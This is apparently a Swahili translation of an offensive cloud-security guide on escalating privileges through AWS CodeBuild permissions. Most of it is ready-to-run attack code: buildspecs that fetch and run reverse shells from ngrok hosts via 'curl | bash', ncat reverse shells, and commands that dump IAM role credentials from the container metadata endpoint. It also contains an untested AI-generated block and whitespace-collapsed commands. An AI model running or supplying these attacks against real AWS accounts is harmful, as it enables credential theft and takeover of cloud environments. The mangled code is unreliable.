Mshambuliaji mwenye ruhusa za iam:PassRole, codebuild:CreateProject, na codebuild:StartBuild au codebuild:StartBuildBatch angeweza kuinua mamlaka kwa jukumu lolote la IAM la codebuild kwa kuunda moja inayotembea.
# Enumerate then env and get credsREV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"# Get rev shellREV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"JSON="{\"name\": \"codebuild-demo-project\",\"source\": {\"type\": \"NO_SOURCE\",\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"},\"artifacts\": {\"type\": \"NO_ARTIFACTS\"},\"environment\": {\"type\": \"LINUX_CONTAINER\",\"image\": \"aws/codebuild/standard:1.0\",\"computeType\": \"BUILD_GENERAL1_SMALL\"},\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"}"REV_PATH="/tmp/rev.json"printf"$JSON"> $REV_PATH# Create projectawscodebuildcreate-project--cli-input-jsonfile://$REV_PATH# Build itawscodebuildstart-build--project-namecodebuild-demo-project# Wait 3-4 mins until it's executed# Then you can access the logs in the console to find the AWS role token in the output# Delete the projectawscodebuilddelete-project--namecodebuild-demo-project
# Generated by AI, not tested# Create a buildspec.yml file with reverse shell commandecho'version: 0.2phases:build:commands:- curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash'>buildspec.yml# Upload the buildspec to the bucket and give access to everyoneawss3cpbuildspec.ymls3:<S3_BUCKET_NAME>/buildspec.yml# Create a new CodeBuild project with the buildspec.yml fileaws codebuild create-project --name reverse-shell-project --source type=S3,location=<S3_BUCKET_NAME>/buildspec.yml --artifacts type=NO_ARTIFACTS --environment computeType=BUILD_GENERAL1_SMALL,image=aws/codebuild/standard:5.0,type=LINUX_CONTAINER --service-role <YOUR_HIGH_PRIVILEGE_ROLE_ARN> --timeout-in-minutes 60
# Start a build with the new projectawscodebuildstart-build--project-namereverse-shell-project
Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu lolote la AWS Codebuild.
Katika konteina ya Codebuild faili /codebuild/output/tmp/env.sh ina kila mabadiliko ya mazingira yanayohitajika kufikia akiba ya metadata.
Faili hii ina mabadiliko ya mazingira AWS_CONTAINER_CREDENTIALS_RELATIVE_URI ambayo ina njia ya URL ya kufikia akiba. Itakuwa kama hii /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420
Ongeza hiyo kwenye URL http://169.254.170.2/ na utaweza kudump akiba ya jukumu.
Zaidi ya hayo, pia ina mabadiliko ya mazingira ECS_CONTAINER_METADATA_URI ambayo ina URL kamili ya kupata habari za metadata kuhusu konteina.
Kama ilivyo katika sehemu ya awali, ikiwa badala ya kuunda mradi wa kujenga unaweza kuubadilisha, unaweza kuonyesha Jukumu la IAM na kuiba tokeni.
REV_PATH="/tmp/codebuild_pwn.json"# Enumerate then env and get credsREV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"# Get rev shellREV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"# You need to indicate the name of the project you want to modifyJSON="{\"name\": \"<codebuild-demo-project>\",\"source\": {\"type\": \"NO_SOURCE\",\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"},\"artifacts\": {\"type\": \"NO_ARTIFACTS\"},\"environment\": {\"type\": \"LINUX_CONTAINER\",\"image\": \"aws/codebuild/standard:1.0\",\"computeType\": \"BUILD_GENERAL1_SMALL\"},\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"}"printf"$JSON"> $REV_PATHawscodebuildupdate-project--cli-input-jsonfile://$REV_PATHawscodebuildstart-build--project-namecodebuild-demo-project
Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu lolote la AWS Codebuild.
codebuild:StartBuild | codebuild:StartBuildBatch
Ni kwa ruhusa moja tu kati ya hizi inatosha kuanzisha ujenzi na buildspec mpya na kuiba token ya jukumu la iam lililoteuliwa kwa mradi:
Kama ilivyo katika sehemu ya awali lakini bila ruhusa ya iam:PassRole, unaweza kutumia ruhusa hii kubadilisha miradi ya Codebuild iliyopo na kufikia jukumu walilopewa tayari.
REV_PATH="/tmp/codebuild_pwn.json"# Get rev shellREV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"# You need to indicate the name of the project you want to modifyJSON="{\"name\": \"codebuild_lab_3_project\",\"source\": {\"type\": \"NO_SOURCE\",\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\"
},\"artifacts\": {\"type\": \"NO_ARTIFACTS\"},\"environment\": {\"type\": \"LINUX_CONTAINER\",\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",\"computeType\": \"BUILD_GENERAL1_SMALL\",\"imagePullCredentialsType\": \"CODEBUILD\"}}"printf"$JSON"> $REV_PATH# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!awscodebuildupdate-project--cli-input-jsonfile://$REV_PATHawscodebuildstart-build-batch--project-namecodebuild-demo-project
REV_PATH="/tmp/codebuild_pwn.json"# Enumerate then env and get credsREV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"# Get rev shellREV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"JSON="{\"name\": \"<codebuild-demo-project>\",\"source\": {\"type\": \"NO_SOURCE\",\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"},\"artifacts\": {\"type\": \"NO_ARTIFACTS\"},\"environment\": {\"type\": \"LINUX_CONTAINER\",\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",\"computeType\": \"BUILD_GENERAL1_SMALL\",\"imagePullCredentialsType\": \"CODEBUILD\"}}"# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!printf"$JSON"> $REV_PATHawscodebuildupdate-project--cli-input-jsonfile://$REV_PATHawscodebuildstart-build--project-namecodebuild-demo-project
Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa majukumu ya AWS Codebuild yaliyoambatanishwa.
SSM
Kuwa na idhini za kutosha kuanzisha kikao cha ssm inawezekana kupata ndani ya mradi wa Codebuild unaojengwa.
Mshambuliaji anayeweza kuanzisha/kurestart ujenzi wa mradi maalum wa CodeBuild ambao unahifadhi faili yake ya buildspec.yml kwenye S3 bucket ambayo mshambuliaji ana ruhusa ya kuandika, anaweza kupata utekelezaji wa amri katika mchakato wa CodeBuild.
Kumbuka: kupandishwa vyeo kuna umuhimu tu ikiwa mfanyakazi wa CodeBuild ana jukumu tofauti, kwa matumaini lenye mamlaka zaidi, kuliko lile la mshambuliaji.
awss3cps3://<build-configuration-files-bucket>/buildspec.yml./vim./buildspec.yml# Add the following lines in the "phases > pre_builds > commands" section## - apt-get install nmap -y# - ncat <IP> <PORT> -e /bin/shawss3cp./buildspec.ymls3://<build-configuration-files-bucket>/buildspec.ymlawscodebuildstart-build--project-name<project-name># Wait for the reverse shell :)
Unaweza kutumia kitu kama hiki builspec kupata reverse shell:
Impact: Privesc moja kwa moja kwa jukumu linalotumiwa na mfanyakazi wa AWS CodeBuild ambao kwa kawaida una mamlaka ya juu.
Kumbuka kwamba buildspec inaweza kutarajiwa kuwa katika muundo wa zip, hivyo mshambuliaji atahitaji kupakua, kufungua, kubadilisha buildspec.yml kutoka kwenye saraka ya mzizi, kuzipa tena na kupakia
